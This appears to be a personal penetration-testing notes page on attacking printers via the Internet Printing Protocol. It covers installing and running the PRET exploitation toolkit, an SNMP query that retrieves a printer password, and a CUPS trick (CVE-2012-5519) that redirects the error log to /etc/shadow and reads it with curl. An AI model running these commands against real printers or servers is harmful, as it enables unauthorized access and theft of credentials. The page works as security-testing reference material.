Internet Printing Protocol (IPP)
The Internet Printing Protocol (IPP) is protocol to manage printers and print jobs, query printer status, and other tasks.
ποΈ Port: 631 (TCP)
Refer to the IPP Guide. Not all printers use the IPP protocol. See also: Hacking Network Printers.
IPP vulnerabilities β οΈ
π See the Printer Security Testing Cheat Sheet.
You can use the PRET (3.4k β) toolkit to try to exploit printers using the IPP protocol. You can install it using:
$ git clone https://github.com/RUB-NDS/PRET && cd PRET
$ python2 -m pip install colorama pysnmP
Discover printers
$ python pret.py
Once you found a printer, you must find which language the printer understands
-
xxx.lan ps: Postscript language -
IP pjl: Printer Job language -
/dev/usb/lp0 pcl: Printer Command Language, Must be directly connected (for instance, by USB).
$ python pret.py [options above]
xxx> help
β‘οΈ You can check the web interface (IP:631) if any.
β‘οΈ You may use PRETty (0.2k β), an automation of PRET in python.
π» To-do π»
Stuff that I found, but never read/used yet.
- SNMP could be used to get the printer password (
snmpget -v 1 -c public IP .1.3.6.1.4.1.11.2.3.9.1.1.13.0)
bytes_hex = "<returned bytes here>"
bytes_list = bytes_hex.split()
print("".join([chr(int(byte, 16)) for byte in bytes_list]))
- CUPS (CVE-2012-5519 == arbitrary read or if there are printers, we can also use CVE-2015-1158)
$ cupsctl ErrorLog=/etc/shadow
$ curl localhost:631/admin/log/error_log?